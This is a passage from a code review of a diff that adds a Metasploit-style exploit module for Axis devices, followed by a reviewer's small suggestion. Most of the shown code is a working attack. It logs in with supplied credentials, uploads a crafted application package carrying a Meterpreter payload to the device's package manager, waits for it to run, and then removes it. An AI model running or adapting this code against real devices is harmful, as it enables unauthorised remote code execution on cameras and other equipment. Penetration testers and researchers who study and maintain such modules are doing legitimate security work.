modules/exploits/linux/http/axis_app_install.rb

```diff
@@ -0,0 +1,254 @@
+
+    # Instruct the application to install the constructed EAP
+    multipart_form = Rex::MIME::Message.new
+    multipart_form.add_part('{"apiVersion":"1.0","method":"install"}', 'application/json', nil, 'form-data; name="data"; filename="blob"')
+    multipart_form.add_part(eap, 'application/octet-stream', 'binary', 'form-data; name="fileData"; filename="exploit.eap"')
+
+    install_endpoint = normalize_uri(target_uri.path, '/axis-cgi/packagemanager.cgi')
+    print_status("Sending an application upload request to #{install_endpoint}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'uri' => install_endpoint,
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'data' => multipart_form.to_s
+    })
+
+    # check for successful installation
+    fail_with(Failure::Disconnected, 'Connection failed') unless res
+    fail_with(Failure::UnexpectedReply, "HTTP status code is not 200 OK: #{res.code}") unless res.code == 200
+    body_json = res.get_json_document
+    fail_with(Failure::UnexpectedReply, 'Missing JSON response') if body_json.empty?
+    # {"apiVersion"=>"1.4", "method"=>"install", "error"=>{"code"=>60, "message"=>"Failed to install acap"}}
+    fail_with(Failure::UnexpectedReply, 'The target responded with a JSON error') unless body_json['error'].nil?
+
+    # syncing the unstaged meterpreter payload seems to take a little bit for the poor little
+    # embedded filesystem. Give it a chance to sync up before we try to remove the application.
+    print_good('Application installed. Pausing 5 seconds to let the filesystem sync.')
+    sleep(5)
+  ensure
+    uninstall_endpoint = normalize_uri(target_uri.path, '/axis-cgi/applications/control.cgi')
+    print_status("Sending a delete application request to #{uninstall_endpoint}")
+    res = send_request_cgi({
+      'method' => 'GET',
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'uri' => uninstall_endpoint,
+      'vars_get' => {
+        'action' => 'remove',
+        'package' => appname.to_s
+      }
+    })
+
+    # instructions for manually removal if the above fails. That should never happen, but best be safe.
+    removal_instructions = 'To manually remove the application, log in to the system and then select the apps tab. ' \
+      "Find the app named '#{appname}' and select it. Click the trash bin icon to uninstall it."
+
+    # check for successful removal
+    print_bad("The server did not respond to the application deletion request. #{removal_instructions}") unless res
+    print_bad("The server did not respond with 200 OK to the application deletion request. #{removal_instructions}") unless res.code == 200
+    print_bad("The application deletion response did not contain the expected body. #{removal_instructions}") unless res.body.include?('OK')
+  end
```

Comment:
```suggestion
  print_good("The application #{appname} was successfully removed from the target!")
  end
```
Might be good to alert the user when things do go right 😄